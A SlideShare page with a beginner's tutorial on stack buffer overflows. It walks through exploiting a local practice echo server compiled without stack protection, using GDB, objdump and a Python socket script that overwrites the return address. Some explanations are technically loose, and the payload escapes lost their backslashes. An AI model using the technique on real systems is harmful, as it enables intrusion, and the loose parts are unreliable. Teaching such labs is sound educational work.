SlideShare ist ein Scribd-Unternehmen logo

Buffer overflow tutorial

H
hughpearse
Technologie
1 von 3
Downloaden Sie, um offline zu lesen
Buffer Overflow Tutorial 1 This document aims to teach people how to create a piece of data that can alter the flow of a program in such a way that it behaves in a way for which it was not intended . To begin this lesson you need an understanding of how a function is called in a computer application written in the C programming language. A group of machine instructions combined together, which serve a single purpose is called a “function” or sometimes a “method”. When a programmer creates a function, the name of the function is usually the decision of the programmer, unless the function was acquired by some other means. These instructions are written in a readable language called the C programming language. When the programmer has finished writing the application, they will run it through a program that is an advanced find-and-replace tool. This tool converts the human readable programming language into machine code and then structures it into a file format suitable for various operating systems. Two of the most well file formats are called the Windows Portable Executable (PE) and the Linux Executable and Linkable Format (ELF). When an ELF or a PE file is executed, the file is loaded into RAM where it is assigned a memory range for its Stack and its Heap. The Heap memory is for storing data which is assigned a memory address at runtime (for example data stored in a variable created using the malloc() function). The stack is used for storing variables whose memory address is pre-calculated before the program is executed. When a child function is called, the CPU creates a new logical block in the stack called a stack frame. The first piece of information put onto the stack frame is the memory address of the parent instruction that called the child function. This memory address has been incremented by one so that it points to the next instruction, to prevent returning to the calling instruction and getting stuck in an infinite loop. When the child function has completed, it pops all the data off the stack frame until it reaches the last instruction which is the return address pointing back to the parent function. By grouping variables and return addresses into the same location in memory we can begin to create our buffer overflow and stack overflow attack. By overfilling the variables with data, this causes our application to write into the memory beside the variables which means we can modify the return address. Imagine a situation where an application calls a function that is vulnerable to a buffer overflow attack. After calling the vulnerable function, the application tests if a condition is true (using a secret rule). From the attackers point of view, the secret condition is not important. However the instructions that would be executed if the condition is true, are the target for an attack. To do this the attacker must overflow the buffer in the vulnerable function and must write a memory address into the buffer which overwrites the return address at the bottom of the stack frame. This address should not point at the condition, but it should point at the first instruction that would be executed if the condition were true. To start you compile and run the program, it opens a network socket on a port number supplied in the parameter and waits for a connection. When a network connection is initiated, it echos back whatever is sent. To compile the program on a 64bit machine running Linux use the following command.: gcc -fno-stack-protector -mpreferred-stack-boundary=4 -ggdb program.c -o a.out To run the program you can type: . /a.out 8080 To connect to the program you can use telnet, but it will not permit you to type non-printable characters outside of the ASCII range. Non-printable character are necessary to write a return address in binary. telnet localhost 8080
Alternatively, if you do not wish to use telnet and would like to use a script here is an example in python (note the memory addresses on Intel CPUs are in little endian format): import socket host = "localhost" port = 8080 size = 30 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send("AAAAAAAx00") data = s.recv(size) s.close() print data There is also a better way to execute your application than “./a.out 8080”. If you launch your application inside a debugger such as GDB you can add breakpoints to pause execution, you can see the instructions, you can see the memory addresses of the instructions and you can see your stack frame. gdb ./a.out Inside GDB the following commands are useful to know. disas HandleTCPClient Disassemble the function “HandleTCPClient” disas vulnerable Disassemble the function “vulnerable” set args 8080 Set the program arguments to “8080” break *0x1234567 Set a breakpoint to pause execution at memory address “1234567”. Hint: try setting this to the last instruction in the vulnerable function. break main Set a breakpoint at the main function run Execute the program until a breakpoint is reached step Execute the next instruction in the executable info frame Display the current stack frame information. Try doing this when you a the breakpoint. x/128xb $rsp Display 128 bytes of memory in hexadecimal ($rsp is the stack pointer, sometimes $esp). print variable Display value of variable continue Continue executing the program until the next breakpoint is reached. kill Terminate the application without exiting the debugger quit Exit the GDB application To disassemble the executable outside the debugger try: objdump -d ./a.out > output.txt Note: If you kill the program mid execution, then it may hold the listening port in a waiting state for approximately 55 seconds. This timeout can be monitored using the command : sudo watch -n 0 netstat -tunpal
The trick to creating an exploit for the application is to create a long string with the virtual address of the instruction we want to jump to. This virtual address should be appended to the end of the buffer so that it overwrites the return address at the bottom of the stack frame. To find this address run the following command: gdb ./a.out 8080 (gdb) disas HandleTCPClient It should give the following output: 0x0000000000400bf3 <+74>: callq 0x400b6a <vulnerable> 0x0000000000400bf8 <+79>: lea -0x40(%rbp),%rax 0x0000000000400bfc <+83>: mov $0x400e59,%esi 0x0000000000400c01 <+88>: mov %rax,%rdi 0x0000000000400c04 <+91>: callq 0x4008a8 <strcmp@plt> 0x0000000000400c09 <+96>: test %eax,%eax 0x0000000000400c0b <+98>: jne 0x400c17 <HandleTCPClient+110> 0x0000000000400c0d <+100>: mov $0x0,%eax 0x0000000000400c12 <+105>: callq 0x400b99 <secret> Notice the address of the line that executes the function secret() is “400c12”. Lets append this memory address to our python exploit. You will need to customize the address for your own system. import socket host = "localhost" port = 8080 size = 30 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send("AAAAAAAAAAAAAAAAAAAAAAAAx12x0cx40x00x00") data = s.recv(size) s.close() print data Run the exploit using the following command: python pycracker.py The server should output the following lines: Talking with client 127.0.0.1 This application has been cracked! Bus error

Empfohlen

Programming Assignment Help
Programming Assignment HelpProgramming Assignment Help
Programming Assignment HelpProgramming Homework Help
 
Chapter 6 notes
Chapter 6 notesChapter 6 notes
Chapter 6 notesHarshitParkar6677
 
Computer Science Assignment Help
Computer Science Assignment HelpComputer Science Assignment Help
Computer Science Assignment HelpProgramming Homework Help
 
Chapter 5 notes new
Chapter 5 notes newChapter 5 notes new
Chapter 5 notes newHarshitParkar6677
 
Operating System Assignment Help
Operating System Assignment HelpOperating System Assignment Help
Operating System Assignment HelpProgramming Homework Help
 
Operating System Engineering Quiz
Operating System Engineering QuizOperating System Engineering Quiz
Operating System Engineering QuizProgramming Homework Help
 
First session quiz
First session quizFirst session quiz
First session quizKeroles karam khalil
 
Computer Science Homework Help
Computer Science Homework HelpComputer Science Homework Help
Computer Science Homework HelpProgramming Homework Help
 

Empfohlen

Programming Assignment Help
Programming Assignment HelpProgramming Assignment Help
Programming Assignment HelpProgramming Homework Help
 
Chapter 6 notes
Chapter 6 notesChapter 6 notes
Chapter 6 notesHarshitParkar6677
 
Computer Science Assignment Help
Computer Science Assignment HelpComputer Science Assignment Help
Computer Science Assignment HelpProgramming Homework Help
 
Chapter 5 notes new
Chapter 5 notes newChapter 5 notes new
Chapter 5 notes newHarshitParkar6677
 
Operating System Assignment Help
Operating System Assignment HelpOperating System Assignment Help
Operating System Assignment HelpProgramming Homework Help
 
Operating System Engineering Quiz
Operating System Engineering QuizOperating System Engineering Quiz
Operating System Engineering QuizProgramming Homework Help
 
First session quiz
First session quizFirst session quiz
First session quizKeroles karam khalil
 
Computer Science Homework Help
Computer Science Homework HelpComputer Science Homework Help
Computer Science Homework HelpProgramming Homework Help
 
20 -miscellaneous
20 -miscellaneous20 -miscellaneous
20 -miscellaneousHector Garzo
 
Chapter 5 notes
Chapter 5 notesChapter 5 notes
Chapter 5 notesHarshitParkar6677
 
Operating System Assignment Help
Operating System Assignment HelpOperating System Assignment Help
Operating System Assignment HelpProgramming Homework Help
 
Linux Kernel, tested by the Linux-version of PVS-Studio
Linux Kernel, tested by the Linux-version of PVS-StudioLinux Kernel, tested by the Linux-version of PVS-Studio
Linux Kernel, tested by the Linux-version of PVS-StudioPVS-Studio
 
Perl Intro 4 Debugger
Perl Intro 4 DebuggerPerl Intro 4 Debugger
Perl Intro 4 DebuggerShaun Griffith
 
C Homework Help
C Homework HelpC Homework Help
C Homework HelpProgramming Homework Help
 
Porting is a Delicate Matter: Checking Far Manager under Linux
Porting is a Delicate Matter: Checking Far Manager under LinuxPorting is a Delicate Matter: Checking Far Manager under Linux
Porting is a Delicate Matter: Checking Far Manager under LinuxPVS-Studio
 
Python Programming Essentials - M25 - os and sys modules
Python Programming Essentials - M25 - os and sys modulesPython Programming Essentials - M25 - os and sys modules
Python Programming Essentials - M25 - os and sys modulesP3 InfoTech Solutions Pvt. Ltd.
 
32 OpenMP Traps For C++ Developers
32 OpenMP Traps For C++ Developers32 OpenMP Traps For C++ Developers
32 OpenMP Traps For C++ DevelopersPVS-Studio
 
computer notes - Inter process communication
computer notes - Inter process communicationcomputer notes - Inter process communication
computer notes - Inter process communicationecomputernotes
 
Intimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkIntimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkAnimesh Roy
 
A green solution to solve a race condition problem
A green solution to solve a race condition problemA green solution to solve a race condition problem
A green solution to solve a race condition problemKai Zhou
 
Assembler (2)
Assembler (2)Assembler (2)
Assembler (2)Vaibhav Bajaj
 
Asynchronous in dot net4
Asynchronous in dot net4Asynchronous in dot net4
Asynchronous in dot net4Wei Sun
 
Assembly Language Programming By Ytha Yu, Charles Marut Chap 4 (Introduction ...
Assembly Language Programming By Ytha Yu, Charles Marut Chap 4 (Introduction ...Assembly Language Programming By Ytha Yu, Charles Marut Chap 4 (Introduction ...
Assembly Language Programming By Ytha Yu, Charles Marut Chap 4 (Introduction ...Bilal Amjad
 
Heading for a Record: Chromium, the 5th Check
Heading for a Record: Chromium, the 5th CheckHeading for a Record: Chromium, the 5th Check
Heading for a Record: Chromium, the 5th CheckPVS-Studio
 
Assembler
AssemblerAssembler
AssemblerMohd Arif
 
C programming session9 -
C programming session9 -C programming session9 -
C programming session9 -Keroles karam khalil
 
Loader and Its types
Loader and Its typesLoader and Its types
Loader and Its typesParth Dodiya
 
Python Programming Essentials - M17 - Functions
Python Programming Essentials - M17 - FunctionsPython Programming Essentials - M17 - Functions
Python Programming Essentials - M17 - FunctionsP3 InfoTech Solutions Pvt. Ltd.
 
ARM Embeded_Firmware.pdf
ARM Embeded_Firmware.pdfARM Embeded_Firmware.pdf
ARM Embeded_Firmware.pdfhakilic1
 
interview questions.docx
interview questions.docxinterview questions.docx
interview questions.docxSeoTechnoscripts
 

Weitere ähnliche Inhalte

Was ist angesagt?

Linux Kernel, tested by the Linux-version of PVS-Studio
Linux Kernel, tested by the Linux-version of PVS-StudioLinux Kernel, tested by the Linux-version of PVS-Studio
Linux Kernel, tested by the Linux-version of PVS-StudioPVS-Studio
 
Porting is a Delicate Matter: Checking Far Manager under Linux
Porting is a Delicate Matter: Checking Far Manager under LinuxPorting is a Delicate Matter: Checking Far Manager under Linux
Porting is a Delicate Matter: Checking Far Manager under LinuxPVS-Studio
 
Python Programming Essentials - M25 - os and sys modules
Python Programming Essentials - M25 - os and sys modulesPython Programming Essentials - M25 - os and sys modules
Python Programming Essentials - M25 - os and sys modulesP3 InfoTech Solutions Pvt. Ltd.
 
32 OpenMP Traps For C++ Developers
32 OpenMP Traps For C++ Developers32 OpenMP Traps For C++ Developers
32 OpenMP Traps For C++ DevelopersPVS-Studio
 
computer notes - Inter process communication
computer notes - Inter process communicationcomputer notes - Inter process communication
computer notes - Inter process communicationecomputernotes
 
Intimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkIntimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkAnimesh Roy
 
A green solution to solve a race condition problem
A green solution to solve a race condition problemA green solution to solve a race condition problem
A green solution to solve a race condition problemKai Zhou
 
Asynchronous in dot net4
Asynchronous in dot net4Asynchronous in dot net4
Asynchronous in dot net4Wei Sun
 
Assembly Language Programming By Ytha Yu, Charles Marut Chap 4 (Introduction ...
Assembly Language Programming By Ytha Yu, Charles Marut Chap 4 (Introduction ...Assembly Language Programming By Ytha Yu, Charles Marut Chap 4 (Introduction ...
Assembly Language Programming By Ytha Yu, Charles Marut Chap 4 (Introduction ...Bilal Amjad
 
Heading for a Record: Chromium, the 5th Check
Heading for a Record: Chromium, the 5th CheckHeading for a Record: Chromium, the 5th Check
Heading for a Record: Chromium, the 5th CheckPVS-Studio
 
Loader and Its types
Loader and Its typesLoader and Its types
Loader and Its typesParth Dodiya
 

Was ist angesagt? (20)

20 -miscellaneous
20 -miscellaneous20 -miscellaneous
20 -miscellaneous
 
Chapter 5 notes
Chapter 5 notesChapter 5 notes
Chapter 5 notes
 
Operating System Assignment Help
Operating System Assignment HelpOperating System Assignment Help
Operating System Assignment Help
 
Linux Kernel, tested by the Linux-version of PVS-Studio
Linux Kernel, tested by the Linux-version of PVS-StudioLinux Kernel, tested by the Linux-version of PVS-Studio
Linux Kernel, tested by the Linux-version of PVS-Studio
 
Perl Intro 4 Debugger
Perl Intro 4 DebuggerPerl Intro 4 Debugger
Perl Intro 4 Debugger
 
C Homework Help
C Homework HelpC Homework Help
C Homework Help
 
Porting is a Delicate Matter: Checking Far Manager under Linux
Porting is a Delicate Matter: Checking Far Manager under LinuxPorting is a Delicate Matter: Checking Far Manager under Linux
Porting is a Delicate Matter: Checking Far Manager under Linux
 
Python Programming Essentials - M25 - os and sys modules
Python Programming Essentials - M25 - os and sys modulesPython Programming Essentials - M25 - os and sys modules
Python Programming Essentials - M25 - os and sys modules
 
32 OpenMP Traps For C++ Developers
32 OpenMP Traps For C++ Developers32 OpenMP Traps For C++ Developers
32 OpenMP Traps For C++ Developers
 
computer notes - Inter process communication
computer notes - Inter process communicationcomputer notes - Inter process communication
computer notes - Inter process communication
 
Intimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkIntimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit Framework
 
A green solution to solve a race condition problem
A green solution to solve a race condition problemA green solution to solve a race condition problem
A green solution to solve a race condition problem
 
Assembler (2)
Assembler (2)Assembler (2)
Assembler (2)
 
Asynchronous in dot net4
Asynchronous in dot net4Asynchronous in dot net4
Asynchronous in dot net4
 
Assembly Language Programming By Ytha Yu, Charles Marut Chap 4 (Introduction ...
Assembly Language Programming By Ytha Yu, Charles Marut Chap 4 (Introduction ...Assembly Language Programming By Ytha Yu, Charles Marut Chap 4 (Introduction ...
Assembly Language Programming By Ytha Yu, Charles Marut Chap 4 (Introduction ...
 
Heading for a Record: Chromium, the 5th Check
Heading for a Record: Chromium, the 5th CheckHeading for a Record: Chromium, the 5th Check
Heading for a Record: Chromium, the 5th Check
 
Assembler
AssemblerAssembler
Assembler
 
C programming session9 -
C programming session9 -C programming session9 -
C programming session9 -
 
Loader and Its types
Loader and Its typesLoader and Its types
Loader and Its types
 
Python Programming Essentials - M17 - Functions
Python Programming Essentials - M17 - FunctionsPython Programming Essentials - M17 - Functions
Python Programming Essentials - M17 - Functions
 

Ähnlich wie Buffer overflow tutorial

ARM Embeded_Firmware.pdf
ARM Embeded_Firmware.pdfARM Embeded_Firmware.pdf
ARM Embeded_Firmware.pdfhakilic1
 
Basic structure of c programming
Basic structure of c programmingBasic structure of c programming
Basic structure of c programmingTejaswiB4
 
Basic structure of c programming
Basic structure of c programmingBasic structure of c programming
Basic structure of c programmingTejaswiB4
 
HPC and HPGPU Cluster Tutorial
HPC and HPGPU Cluster TutorialHPC and HPGPU Cluster Tutorial
HPC and HPGPU Cluster TutorialDirk Hähnel
 
C, C++ Interview Questions Part - 1
C, C++ Interview Questions Part - 1C, C++ Interview Questions Part - 1
C, C++ Interview Questions Part - 1ReKruiTIn.com
 
maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming Max Kleiner
 
Data structure week 1
Data structure week 1Data structure week 1
Data structure week 1karmuhtam
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit developmentPayampardaz
 
Maxbox starter18
Maxbox starter18Maxbox starter18
Maxbox starter18Max Kleiner
 
Debugging Python with gdb
Debugging Python with gdbDebugging Python with gdb
Debugging Python with gdbRoman Podoliaka
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitJongWon Kim
 
Rasperry pi Part 8
Rasperry pi Part 8Rasperry pi Part 8
Rasperry pi Part 8Techvilla
 

Ähnlich wie Buffer overflow tutorial (20)

ARM Embeded_Firmware.pdf
ARM Embeded_Firmware.pdfARM Embeded_Firmware.pdf
ARM Embeded_Firmware.pdf
 
interview questions.docx
interview questions.docxinterview questions.docx
interview questions.docx
 
Mp lab manual
Mp lab manualMp lab manual
Mp lab manual
 
Basic structure of c programming
Basic structure of c programmingBasic structure of c programming
Basic structure of c programming
 
Basic structure of c programming
Basic structure of c programmingBasic structure of c programming
Basic structure of c programming
 
HPC and HPGPU Cluster Tutorial
HPC and HPGPU Cluster TutorialHPC and HPGPU Cluster Tutorial
HPC and HPGPU Cluster Tutorial
 
C, C++ Interview Questions Part - 1
C, C++ Interview Questions Part - 1C, C++ Interview Questions Part - 1
C, C++ Interview Questions Part - 1
 
maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming
 
Data structure week 1
Data structure week 1Data structure week 1
Data structure week 1
 
C programming session10
C programming session10C programming session10
C programming session10
 
Embedded C programming session10
Embedded C programming session10Embedded C programming session10
Embedded C programming session10
 
C notes.pdf
C notes.pdfC notes.pdf
C notes.pdf
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
 
Maxbox starter18
Maxbox starter18Maxbox starter18
Maxbox starter18
 
Srgoc dotnet
Srgoc dotnetSrgoc dotnet
Srgoc dotnet
 
Debugging Python with gdb
Debugging Python with gdbDebugging Python with gdb
Debugging Python with gdb
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
 
Module-4 Program Design and Anyalysis.pdf
Module-4 Program Design and Anyalysis.pdfModule-4 Program Design and Anyalysis.pdf
Module-4 Program Design and Anyalysis.pdf
 
Concurrency and parallel in .net
Concurrency and parallel in .netConcurrency and parallel in .net
Concurrency and parallel in .net
 
Rasperry pi Part 8
Rasperry pi Part 8Rasperry pi Part 8
Rasperry pi Part 8
 

Mehr von hughpearse

HughPearseEsriTraining
HughPearseEsriTrainingHughPearseEsriTraining
HughPearseEsriTraininghughpearse
 
HughPearse-ACE-Forensics-Certification
HughPearse-ACE-Forensics-CertificationHughPearse-ACE-Forensics-Certification
HughPearse-ACE-Forensics-Certificationhughpearse
 
Prism-Proof Cloud Email Services
Prism-Proof Cloud Email ServicesPrism-Proof Cloud Email Services
Prism-Proof Cloud Email Serviceshughpearse
 
Nmap flags table
Nmap flags tableNmap flags table
Nmap flags tablehughpearse
 
ACE forensics certification
ACE forensics certificationACE forensics certification
ACE forensics certificationhughpearse
 
Diffie-Hellman key exchange
Diffie-Hellman key exchangeDiffie-Hellman key exchange
Diffie-Hellman key exchangehughpearse
 
Metasploit cheat sheet
Metasploit cheat sheetMetasploit cheat sheet
Metasploit cheat sheethughpearse
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 

Mehr von hughpearse (8)

HughPearseEsriTraining
HughPearseEsriTrainingHughPearseEsriTraining
HughPearseEsriTraining
 
HughPearse-ACE-Forensics-Certification
HughPearse-ACE-Forensics-CertificationHughPearse-ACE-Forensics-Certification
HughPearse-ACE-Forensics-Certification
 
Prism-Proof Cloud Email Services
Prism-Proof Cloud Email ServicesPrism-Proof Cloud Email Services
Prism-Proof Cloud Email Services
 
Nmap flags table
Nmap flags tableNmap flags table
Nmap flags table
 
ACE forensics certification
ACE forensics certificationACE forensics certification
ACE forensics certification
 
Diffie-Hellman key exchange
Diffie-Hellman key exchangeDiffie-Hellman key exchange
Diffie-Hellman key exchange
 
Metasploit cheat sheet
Metasploit cheat sheetMetasploit cheat sheet
Metasploit cheat sheet
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 

Kürzlich hochgeladen

The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...AliaaTarek5
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditSkynet Technologies
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationKnoldus Inc.
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 

Kürzlich hochgeladen (20)

The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance Audit
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog Presentation
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 

Buffer overflow tutorial

  • 1. Buffer Overflow Tutorial 1 This document aims to teach people how to create a piece of data that can alter the flow of a program in such a way that it behaves in a way for which it was not intended . To begin this lesson you need an understanding of how a function is called in a computer application written in the C programming language. A group of machine instructions combined together, which serve a single purpose is called a “function” or sometimes a “method”. When a programmer creates a function, the name of the function is usually the decision of the programmer, unless the function was acquired by some other means. These instructions are written in a readable language called the C programming language. When the programmer has finished writing the application, they will run it through a program that is an advanced find-and-replace tool. This tool converts the human readable programming language into machine code and then structures it into a file format suitable for various operating systems. Two of the most well file formats are called the Windows Portable Executable (PE) and the Linux Executable and Linkable Format (ELF). When an ELF or a PE file is executed, the file is loaded into RAM where it is assigned a memory range for its Stack and its Heap. The Heap memory is for storing data which is assigned a memory address at runtime (for example data stored in a variable created using the malloc() function). The stack is used for storing variables whose memory address is pre-calculated before the program is executed. When a child function is called, the CPU creates a new logical block in the stack called a stack frame. The first piece of information put onto the stack frame is the memory address of the parent instruction that called the child function. This memory address has been incremented by one so that it points to the next instruction, to prevent returning to the calling instruction and getting stuck in an infinite loop. When the child function has completed, it pops all the data off the stack frame until it reaches the last instruction which is the return address pointing back to the parent function. By grouping variables and return addresses into the same location in memory we can begin to create our buffer overflow and stack overflow attack. By overfilling the variables with data, this causes our application to write into the 